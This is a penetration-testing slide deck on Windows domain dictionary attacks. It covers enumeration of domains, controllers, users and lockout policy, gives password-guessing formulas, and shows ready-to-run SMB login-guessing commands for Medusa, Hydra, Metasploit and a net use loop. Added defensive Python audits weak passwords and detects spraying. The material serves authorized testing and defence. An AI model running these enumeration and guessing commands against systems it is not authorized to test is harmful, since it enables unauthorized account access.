Introduction to Windows Dictionary Attacks
Author: Scott Sutherland
Who am I?
Scott Sutherland
• Security Consultant @ NetSPI
• Over 10 years of consulting experience
• Security researcher: blogs, white papers, tools, etc.
Presentation Goals
• Identify the value of dictionary attacks
• Provide new penetration testers with a safe approach to Windows dictionary attacks
• Provide security professionals with questions they should be asking their contractors
Before we begin…
Dictionary Attack
Brute Force Attack
Why dictionary attacks?
What are the goals?
• Identify accounts configured with weak or default passwords – “It’s human nature”
• Use accounts as entry points during penetration tests
What’s the impact?
• Unauthorized access to critical:
‒ Systems
‒ Applications
‒ Data
• User impersonation
Are There Alternatives?
Yes.
Approaches typically include:
• Cracking password hashes offline with:
‒ Pre-computed hash libraries like Rainbow Tables
‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper
• Dumping clear text passwords from interactive sessions with Mimikatz
Will Alternatives be Covered?
No.
Dictionary Attacks: Process Overview
Windows Dictionary Attack Process
1. Identify domains
2. Enumerate domain controllers
3. Enumerate domain users
4. Enumerate domain lockout policy
5. Create a dictionary
6. Perform Attack
Identify Domains: Methods
Unauthenticated Methods
• DHCP Information
• NetBIOS Queries
• DNS Queries
• Sniffing Network Traffic
• Review RDP drop down lists
Authenticated Methods
• Review the output of the SET command for “USERDNSDOMAIN”
• Review the registry for the default domain
Identify Domains: Tools
Method: DHCP Info
  Tools: IPCONFIG
  Auth: No
Method: NetBIOS Queries
  Tools: NBTSTAT -A <IP>
  Auth: No
Method: DNS Queries
  Tools: nmap -sL <IP Range> -oA output_rnds
         ./reverseraider -r <IP Range>
         ./dnswalk victim.com
         perl fierce.pl -dns <domainname> -threads 5 -file <domainname>-dns.output
  Auth: No
Method: Sniffing
  Tools: Wireshark (GUI) + filter for browser traffic
         Network Miner (GUI)
         Etherape (GUI)
  Auth: No
Method: RDP Drop Down
  Tools: nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client
  Auth: No
Enumerate DCs: Methods
Unauthenticated Methods
• DNS Queries
• RPC Queries
• Port Scanning
• NetBIOS Scanning
Authenticated Methods
• NET GROUP commands
• LDAP Queries
Enumerate DCs: Tools
Method: DNS Queries
  Tools: NSLOOKUP -type=SRV _ldap._tcp.<domain>
  Auth: No
Method: RPC Queries
  Tools: NLTEST /DCLIST:<domain>
         FindPDC <domain> <request count>
  Auth: No
Method: Port Scanning
  Tools: NMAP -sS -p389,636 -PN <IP Range>
  Auth: No
Method: NetBIOS Scanning
  Tools: FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
  Auth: No
Method: NET GROUP Command
  Tools: net group "Domain Controllers" /domain
  Auth: Yes
Method: LDAP Queries
  Tools: LDAP Administrator (GUI tool)
         Hyena (GUI tool)
         adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
  Auth: Yes & No
Enumerate Domain Users: Methods
Unauthenticated Methods
• RPC Queries
• SID Brute Forcing
• SNMP Queries
• LDAP Queries
• Sharepoint Fuzzing
Authenticated Methods
• NET USER command
• WMI commands
Enumerate Domain Users: Tools 1
Method: RPC Endpoints
  Tools: dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt
         enum -N <ip>
         enum -U <ip>
  Auth: Yes & No
Method: SID Brute Forcing
  Tools: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt
         Getacct (GUI)
  Auth: Yes & No
Method: SNMP Queries
  Tools: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E
         Mibbrowser (GUI)
         SNMP Walk
  Auth: Yes & No
Enumerate Domain Users: Tools 2
Method: LDAP Queries
  Tools: adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt
  Auth: Yes & No
Method: Sharepoint Fuzzing
  Tools: Fuzz parameters with Burp to enumerate domain users. Example URL:
         https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]
  Auth: Yes & No
Method: NET USER Command
  Tools: net user /domain > domain_users.txt
  Auth: Yes
Method: WMI Commands
  Tools: wmic /user:<user> /password:<password> /node:<IP address> useraccount get name > domain_users.txt
  Auth: Yes
Get Domain Lockout Policy: Methods
Unauthenticated Methods
• RPC Endpoints
Authenticated Methods
• NET ACCOUNTS command
What does it all mean?
• Threshold, duration, and window. Example policy:
  Lockout threshold: 5
  Lockout duration: 15
  Lockout observation window: 15
Get Domain Lockout Policy: Tools
Method: RPC Queries
  Tools: enum -P <IP Address>
         dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
  Auth: Yes & No
Method: NET ACCOUNTS Command
  Tools: net accounts /domain
  Auth: Yes
Create a Dictionary: Methods
Classics Still Work
• Blank
• Username as password
• password
Common Formulas = Most Effective
• <Password><Number>
• <Companyname><Number>
• <Season><Year>
• <Sports team><Number>
Popular Dictionaries
• Metasploit dictionaries
• RockYou
• FuzzDB
• John the ripper
Create a Dictionary: Tools
Classics
  Blank password
  Username as password
  "password" as password
Formulas
  <Password><Number>
  <Companyname><Number>
  <Season><Year>
  <Sports team><Number>
Your Brain!
  Think of keywords relative to the target company or geographic location and you’ll get more out of your dictionary attacks!
RockYou
  http://www.skullsecurity.org/wiki/index.php/Passwords
FuzzDB
  http://code.google.com/p/fuzzdb/
  https://github.com/rustyrobot/fuzzdb
John the Ripper
  http://www.openwall.com/wordlists/
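Turned around for the defender, the same lists make a useful audit rule: any password that matches one of the classics or formulas above is one a tester will guess in the first round. The following Python is an added example, not code from Scott Sutherland's deck. It flags a password that matches the blank, username-as-password and "password" classics or the <Password><Number>, <Companyname><Number>, <Season><Year> and <Sports team><Number> formulas; the company and team terms are assumed inputs the deployer supplies, and the sample accounts are constructed for the example.

```python
"""Audit passwords against the weak patterns listed on these slides.

Added example, not from the original deck: a defender-side check for the
'classics' (blank, username as password, 'password') and the formulas
(<Password><Number>, <Companyname><Number>, <Season><Year>,
<Sports team><Number>). Company and team terms are assumed inputs the
deployer supplies; the sample accounts below are constructed.
"""
import re

SEASONS = ("spring", "summer", "fall", "autumn", "winter")
TRAILING = r"[!@#$%*.]*"  # common decoration such as the '!' in 'Summer2024!'


def weak_password_reasons(password, username, company_terms=(), team_terms=()):
    """Return the weak patterns a password matches (empty list if none)."""
    pw = password.strip().lower()
    reasons = []
    if pw == "":
        reasons.append("blank")
    if pw == username.lower():
        reasons.append("username as password")
    if pw == "password":
        reasons.append("'password'")
    elif re.fullmatch(r"p[a@]ssw[o0]rd\d+" + TRAILING, pw):
        reasons.append("<Password><Number>")
    if re.fullmatch(rf"(?:{'|'.join(SEASONS)})\d{{2,4}}{TRAILING}", pw):
        reasons.append("<Season><Year>")
    # Deployer-supplied terms: company names and local sports teams, each
    # optionally followed by digits (the bare term is just as weak).
    for label, terms in (("<Companyname><Number>", company_terms),
                         ("<Sports team><Number>", team_terms)):
        for term in terms:
            if re.fullmatch(re.escape(term.lower()) + r"\d*" + TRAILING, pw):
                reasons.append(label)
                break
    return reasons


def audit_accounts(accounts, company_terms=(), team_terms=()):
    """Return {username: reasons} for every account that matches a weak pattern."""
    findings = {}
    for username, password in accounts:
        reasons = weak_password_reasons(password, username, company_terms, team_terms)
        if reasons:
            findings[username] = reasons
    return findings


# Constructed sample input (not real accounts), e.g. the output of a
# sanctioned offline audit of a password dump.
SAMPLE_ACCOUNTS = [
    ("jsmith", ""),
    ("bjones", "BJones"),
    ("mlee", "Password1"),
    ("tchan", "Summer2024!"),
    ("rpatel", "Acme123"),
    ("svc_sql", "Vikings2023"),
    ("kwong", "correct horse battery staple"),
]

if __name__ == "__main__":
    for user, why in audit_accounts(SAMPLE_ACCOUNTS, ("Acme",), ("Vikings",)).items():
        print(f"{user}: {', '.join(why)}")
```

The same function can sit behind a password-change hook or an internal audit job; the important design choice is that the company and team lists are data, not code, so the check can be tuned per organisation without touching the matcher.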
Perform Dictionary Attack: Rules
The Rule to Live By:
Respect the lockout policy
• General idea = attempt a few passwords for all of the domain users each round, not 1000 passwords against one user
• Subtract 2 attempts from the lockout threshold. Example: Lockout=5, Attempts=3
• Wait 5 to 10 minutes beyond the observation window
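The rule above, a few passwords across every user per round while staying under the lockout threshold and waiting out the observation window, is also exactly the pattern a defender can look for in failed-logon telemetry, and it is the pattern the lockout policy slide (threshold, duration, window) defines. The following Python is an added example and not part of Scott Sutherland's deck. It parses constructed Windows Security Event ID 4625 ("An account failed to log on") records in a simplified one-line format (the format, addresses and account names are assumptions), flags a source that fails against many distinct accounts within one observation window while no single account reaches the threshold, and separately flags a source/account pair that reaches the threshold, which is the lockout a tester causes by ignoring the rule.

```python
"""Spray-pattern detection over Windows failed-logon events.

Added example, not code from the original deck. Event ID 4625 is the Windows
Security log "An account failed to log on" event; the one-line record format,
addresses and account names below are constructed for this example.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed flattened record format, one event per line.
EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s+SourceIP=(?P<src>\S+)\s+TargetUser=(?P<user>\S+)$"
)


def build_sample_log():
    """Construct sample records: one spraying source, one benign typo burst,
    and one source hammering a single account past the lockout threshold."""
    t0 = datetime(2024, 1, 10, 9, 0, 0)
    lines = []
    users = [f"user{i:02d}" for i in range(12)]
    # Spray: two rounds over 12 accounts, ten seconds apart, every account under threshold.
    for rnd in range(2):
        for i, user in enumerate(users):
            ts = t0 + timedelta(seconds=10 * (rnd * len(users) + i))
            lines.append(f"{ts.isoformat()} EventID=4625 SourceIP=10.0.0.50 TargetUser={user}")
    # Benign: one user mistyping a password three times from a workstation.
    for k in range(3):
        ts = t0 + timedelta(minutes=1, seconds=k)
        lines.append(f"{ts.isoformat()} EventID=4625 SourceIP=10.0.0.77 TargetUser=alice")
    # Single-account brute force: six failures in a minute (lockout threshold is 5).
    for k in range(6):
        ts = t0 + timedelta(minutes=2, seconds=k)
        lines.append(f"{ts.isoformat()} EventID=4625 SourceIP=10.0.0.99 TargetUser=svc_backup")
    # A successful logon (4624) that the parser must ignore.
    lines.append(f"{t0.isoformat()} EventID=4624 SourceIP=10.0.0.50 TargetUser=user00")
    return "\n".join(lines)


def parse_events(text):
    """Return (timestamp, source, account) tuples for the 4625 records only."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m and m.group("eid") == "4625":
            events.append((datetime.fromisoformat(m.group("ts")),
                           m.group("src"), m.group("user").lower()))
    return events


def detect_spray(events, threshold=5, window=timedelta(minutes=15), min_accounts=10):
    """One alert per source whose failures, inside a single observation window,
    touch at least min_accounts distinct accounts while no account reaches the
    lockout threshold (the 'a few tries against everyone' signature)."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    alerts = {}
    for src, items in by_src.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            counts = Counter(user for _, user in items[start:end + 1])
            distinct, peak = len(counts), max(counts.values())
            if distinct >= min_accounts and peak < threshold:
                best = alerts.get(src)
                if best is None or (distinct, peak) > (best["accounts"], best["max_per_account"]):
                    alerts[src] = {"source": src, "window_start": items[start][0],
                                   "accounts": distinct, "max_per_account": peak}
    return list(alerts.values())


def detect_lockout_risk(events, threshold=5, window=timedelta(minutes=15)):
    """(source, account) pairs whose failures in one window reach the threshold."""
    by_pair = defaultdict(list)
    for ts, src, user in events:
        by_pair[(src, user)].append(ts)
    risky = []
    for (src, user), stamps in by_pair.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                risky.append((src, user))
                break
    return risky


if __name__ == "__main__":
    evts = parse_events(build_sample_log())
    for a in detect_spray(evts):
        print(f"SPRAY  {a['source']}: {a['accounts']} accounts, "
              f"max {a['max_per_account']} tries each from {a['window_start']}")
    for src, user in detect_lockout_risk(evts):
        print(f"LOCKOUT RISK  {src} -> {user}")
```

Set `threshold` and `window` from the domain's actual policy (the `net accounts /domain` values the slides show), and tune `min_accounts` per environment: a terminal server or a NAT gateway fronting many users will legitimately produce failures for many distinct accounts from one address, so in those cases key the rule on the logon source workstation name rather than the address.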
Perform Dictionary Attack: Tools
Tool: Medusa
  Command: medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
  OS: Linux
Tool: Bruter
  Command: Easy-to-use GUI; no CLI that I know of.
  OS: Windows
Tool: Metasploit smb_login
  Command: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E
  OS: Windows and Linux
Tool: Hydra
  Command: hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
  OS: Windows and Linux
Tool: Batch Script
  Command: FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a
  OS: Windows
Conclusions
• There is more than one way to do everything!
• Enumerate all available options
• It’s easy to lock out accounts: respect the password policy
• Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests
More Related Content

What's hot

10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
Scott Sutherland
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
Stephan Borosh
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Priyanka Aash
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
NCC Group
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Priyanka Aash
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
Beau Bullock
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
Andrew McNicol
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
Dennis Maldonado
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
Sam Bowne
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
Sam Bowne
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
Sam Bowne
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beau Bullock
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 

What's hot (20)

10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malwareDefcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
Defcon 22-wesley-mc grew-instrumenting-point-of-sale-malware
 
07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products07182013 Hacking Appliances: Ironic exploits in security products
07182013 Hacking Appliances: Ironic exploits in security products
 
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-mainDefcon 22-philip-young-from-root-to-special-hacking-ibm-main
Defcon 22-philip-young-from-root-to-special-hacking-ibm-main
 
Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3CNIT 126: Ch 2 & 3
CNIT 126: Ch 2 & 3
 
Ch 6: Attacking Authentication
Ch 6: Attacking AuthenticationCh 6: Attacking Authentication
Ch 6: Attacking Authentication
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 

Viewers also liked

Thick client application security assessment
Thick client  application security assessmentThick client  application security assessment
Thick client application security assessment
Sanjay Kumar (Seeking options outside India)
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
Declaration of Mal(WAR)e
Declaration of Mal(WAR)eDeclaration of Mal(WAR)e
Declaration of Mal(WAR)e
NetSPI
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One -  A ClickOnce Love Story - Secure360 2015All You Need is One -  A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
NetSPI
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
Scott Sutherland
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
OWASP Foundation
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Hanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
Keith G. Tidball
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Damon Small
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration Testing
The Hacker News
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
NetSPI
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
Antonio Fontes
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
Dmitry Evteev
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
Harshit Singh Bhatia
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
Ammar WK
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability Scanning
SecurityMetrics
 

Viewers also liked (20)

Thick client application security assessment
Thick client  application security assessmentThick client  application security assessment
Thick client application security assessment
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Declaration of Mal(WAR)e
Declaration of Mal(WAR)eDeclaration of Mal(WAR)e
Declaration of Mal(WAR)e
 
All You Need is One - A ClickOnce Love Story - Secure360 2015
All You Need is One -  A ClickOnce Love Story - Secure360 2015All You Need is One -  A ClickOnce Love Story - Secure360 2015
All You Need is One - A ClickOnce Love Story - Secure360 2015
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
 
Beyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability AssessmentBeyond the Scan: The Value Proposition of Vulnerability Assessment
Beyond the Scan: The Value Proposition of Vulnerability Assessment
 
PCI Guidance On Penetration Testing
PCI Guidance On Penetration TestingPCI Guidance On Penetration Testing
PCI Guidance On Penetration Testing
 
GPU Cracking - On the Cheap
GPU Cracking - On the CheapGPU Cracking - On the Cheap
GPU Cracking - On the Cheap
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Penetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability ScanningPenetration Testing vs. Vulnerability Scanning
Penetration Testing vs. Vulnerability Scanning
 

Similar to Introduction to Windows Dictionary Attacks

Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
Leon Teale
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
The Security of Things Forum
 
Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_Filar seymour oreilly_bot_story_
Filar seymour oreilly_bot_story_
EndgameInc
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain2011 and still bruteforcing - OWASP Spain
2011 and still bruteforcing - OWASP Spain
Christian Martorella
 
ethical Hack
ethical Hackethical Hack
ethical Hack
Viggi Unbeaten
 
Wm4
Wm4Wm4
Wm4
Wm4Wm4
Hacking Web Apps by Brent White
Hacking Web Apps by Brent WhiteHacking Web Apps by Brent White
Hacking Web Apps by Brent White
EC-Council
 
Gates Toorcon X New School Information Gathering
Gates Toorcon X New School Information GatheringGates Toorcon X New School Information Gathering
Gates Toorcon X New School Information Gathering
Chris Gates
 
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
Andrew McNicol
 
Blue Teaming On A Budget
Blue Teaming On A BudgetBlue Teaming On A Budget
Blue Teaming On A Budget
KevinRiley83
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
Chris Gates
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
Grupo Gesfor I+D+i
 
PHP Performance: Principles and tools
PHP Performance: Principles and toolsPHP Performance: Principles and tools
PHP Performance: Principles and tools
10n Software, LLC
 
Tools kali
Tools kaliTools kali
Tools kali
ketban0702
 
OSINT for Attack and Defense
